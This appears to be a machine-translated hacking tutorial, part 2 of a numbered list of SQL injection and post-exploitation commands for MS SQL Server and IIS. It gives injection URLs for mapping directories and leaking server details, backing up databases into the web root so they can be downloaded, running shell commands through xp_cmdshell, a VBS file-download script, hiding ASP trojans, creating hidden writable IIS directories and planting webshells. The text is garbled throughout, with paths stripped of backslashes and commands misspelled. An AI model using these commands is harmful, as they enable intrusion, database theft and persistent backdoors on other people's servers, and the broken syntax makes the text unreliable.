Sorting out the most detailed SQL Injection-related commands (2)

Next, create a temporary table to store all the directories in the Level 1 subdirectory of the d disk. The statement is as follows:

; Create table temp1 (dir nvarchar (255), depth varchar (255 ));--

Save all the directories in the first subdirectory of disk D to temp1. the statement is as follows:
Declare @ dirname varchar (255); set @ dirname = d: + (select top 1 dir from (select top 1 dir from temp where depth = 1 and dir not in (Documents and Settings, Program Files, RECYCLER, System Volume Information, WINDOWS, CAConfig, wmpub, Microsoft UAM volume) order by dir desc) T order by dir); insert into temp1 exec master. dbo. xp_dirtree @ dirname
Of course, you can also save all the directories in the second subdirectory of the d disk to temp1. You just need to change the second top 1 to top 2.

Now, temp1 has saved all directories in the first-level subdirectory of all d disks. Then, we use the same method to determine whether the root directory is under this level subdirectory:
And (select count (*) from temp1 where dir <> user) <(select count (*) from temp1)
If the returned result is true, the root directory may be in this subdirectory. Remember to test more examples. If all the results are false, the WEB root directory is not in this directory, then we are using the same method to obtain disks 2nd, 3... list of all directories under sub-directories to determine whether the WEB root directory is under it. However, before using xp_dirtree, delete the content in Table temp1.

Now let's assume that the WEB root directory is under the first subdirectory of the d drive and the subdirectory name is website. I don't want to say anything about how to get the directory name. Because we know that the depth of the WEB root directory is 2, we need to know which is the real WEB root directory under the website.

Now we use the same method to create 3rd temporary tables:
; Create table temp2 (dir nvarchar (255), depth varchar (255 ));--

Then save all the directories under the web site of disk D to temp2. the statement is as follows:
Declare @ dirname varchar (255); set @ dirname = d: website + (select top 1 dir from (select top 1 dir from temp1 where depth = 1 and dir not in (Documents and Settings, Program Files, RECYCLER, System Volume Information, WINDOWS, CAConfig, wmpub, Microsoft UAM volume) order by dir desc) T order by dir); insert into temp2 exec master. dbo. xp_dirtree @ dirname
Of course, you can also store all the directories in the second subdirectory of the web site of drive d to temp2. you only need to change the second top 1 to top 2.

Now, we use the same method to determine whether the directory is the root directory:
And (select count (*) from temp2 where dir <> user) <(select count (*) from temp2)
If the returned result is true, in order to determine our judgment, we will test several examples. The methods mentioned above show that if multiple examples return true, we will determine that the directory is the WEB root directory.

Basically, the WEB root directory can be obtained using the above method. Now we assume that the WEB root directory is: D: websitewww.
Then, we can back up the current database to this directory for download. Before the backup, we cleared the contents of temp, temp1, and temp2, and then saved the directory trees of C, D, and E to temp, temp1, and temp2.

After downloading the database, remember to drop the three temporary tables. Now we can find all the directories in the downloaded database, including the directories managed in the background and more information.

21. To upgrade WEB users to system user permissions in win2000, you must have administrator permissions to execute the following commands:
C:> cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: WINNTsystem32idq. dll "" C: WINNTsystem32inetsrvhttpext. dll "" C: WINNTsystem32inetsrvhttpodbc. dll "" C: WINNTsystem32inetsrvssinc. dll "" C: WINNTsystem32msw3prt. dll "" C: winntsystem32inetsrvasp. dll"

Cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: windowssystem32idq. dll "" C: windowssystem32inetsrvhttpext. dll "" C: windowssystem32inetsrvhttpodbc. dll "" C: windowssystem32inetsrvssinc. dll "" C: windowssystem32msw3prt. dll "" C: windowssystem32inetsrvasp. dll"

Check whether it is successful:
C:> cscript C: InetpubAdminScriptsadsutil. vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
Inprocessisapiapps: (LIST) (6 Items)
"C: WINNTsystem32idq. dll"
"C: WINNTsystem32inetsrvhttpext. dll"
"C: WINNTsystem32inetsrvhttpodbc. dll"
"C: WINNTsystem32inetsrvssinc. dll"
"C: WINNTsystem32msw3prt. dll"
"C: winntsystem32inetsrvasp. dll"

22. How to hide ASP Trojans:
Create a non-standard directory: mkdir images ..
Copy the ASP Trojan to the directory: copy c: inetpubwwwrootdbm6.asp c: inetpubwwwrootimages... ews. asp
Access ASP Trojans through web: http: // ip/images.../news. asp? Action = login
How to delete a non-standard directory: rmdir images ../s

23. Remove tenlnet ntlm authentication:
; Exec master. dbo. xp_cmdshell tlntadmn config sec =-ntlm-

24. Use echo to write the File Download script iget. vbs:
(1) echo Set x = createObject (^ "Microsoft. XMLHTTP ^ "): x. open ^ "GET ^", LCase (WScript. arguments (0), 0: x. send (): Set s = createObject (^ "ADODB. stream ^ "): s. mode = 3: s. type = 1: s. open (): s. write (x. responseBody): s. saveToFile LCase (WScript. arguments (1), 2> c: iget. vbs

(2) c:> cscript iget. vbs http: // 127.0.0.1/asp/dbm6.asp dbm6.asp

25. manually create a hidden IIS directory:
? View the local virtual directory list: cscript.exe c: inetpubAdminScriptsadsutil. vbs enum w3svc/1/root
? Create a new kiss Directory: mkdir c: aspkiss
? Create a kiss virtual directory: cscript.exe c: inetpubAdminScriptsmkwebdir. vbs-c MyComputer-w "Default Web Site"-v "kiss", "c: aspkiss"
? Add execution and write permissions to the kiss directory:
Cscript.exe c: inetpubAdminScriptsadsutil. vbs set w3svc/1/root/kiss/accesswrite "true"-s:
Cscript.exe c: inetpubAdminScriptsadsutil. vbs set w3svc/1/root/kiss/accessexecute "true"-s:
? ? : Cscript c: inetpubAdminScriptsadsutil. vbs set/w3svc/1/root/kiss/createprocessasuser false
? Access: http: // 127.0.0.1/kiss/test. asp

26. Use openrowset () to connect to the local device for testing:
Select .*
From openrowset (SQLOLEDB, 127.0.0.1; sa; 111111,
Select * FROM [dvbbs]. [dbo]. [dv_admin]) AS

Select * from openrowset (SQLOLEDB, 127.0.0.1; sa; 111111,
Select * FROM [dvbbs]. [dbo]. [dv_admin])

27. Obtain the Host Name:
Http://www.xxxx.com/FullStory.asp? Id = 1 and 1 = convert (int, @ servername )--
Select convert (int, @ servername)
Select @ servername

28. Obtain the database username:
Http://www.XXXX.com/FullStory.asp? Id = 1 and 1 = convert (int, system_user )--
Http://www.19cn.com/showdetail.asp? Id = 49 and user> 0
Select user

29. method 2 for normal users to obtain WEBSHELL:
? Packaging:
EXEC [master]. [dbo]. [xp_makecab] c: est.rar, default, 1, d: cmd. asp
To obtain webshell:
? EXEC [master]. [dbo]. [xp_unpackcab] C: est.rar, c:, 1, n. asp
? To read any file, you must have the dbo permission of the master:
EXEC [master]. [dbo]. [xp_readerrorlog] 1, c: cmd. asp

30. directly back up the database to the web path using a known web path under the sa permission

Http://www.XXXX.com/FullStory.asp? Id = 1; backuup database name to disk = c: inetpubwwwrootsave. db backs up all the data to the WEB directory, and downloads the file over HTTP (of course, the WEB virtual directory is preferred ).

? Traverse the directory structure of the system, analyze the results and find the WEB virtual directory. First, create a temporary table: temp
Http://www.XXXX.com/FullStory.asp? Id = 1; create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
? Next, we can use xp_availablemedia to obtain all the current drives and store them in the temp table:
Http://www.XXXX.com/FullStory.asp? Id = 1; insert temp exec master. dbo. xp_availablemedia ;--
? We can query the temp content to obtain the drive list and related information, or use xp_subdirs to obtain the subdirectory list and store it in the temp table:
Http://www.XXXX.com/FullStory.asp? Id = 1; insert into temp (id) exec master. dbo. xp_subdirs c :;--
? We can also use xp_dirtree to obtain the directory tree structure of all sub-directories and import them to the temp table in an inch:
Http://www.XXXX.com/FullStory.asp? Id = 1; insert into temp (id, num1) exec master. dbo. xp_dirtree c:; -- this allows you to successfully browse all directories (folders ).
? To view the content of a file, run xp_cmdsell:; insert into temp (id) exec master. dbo. xp_1_shell type c: we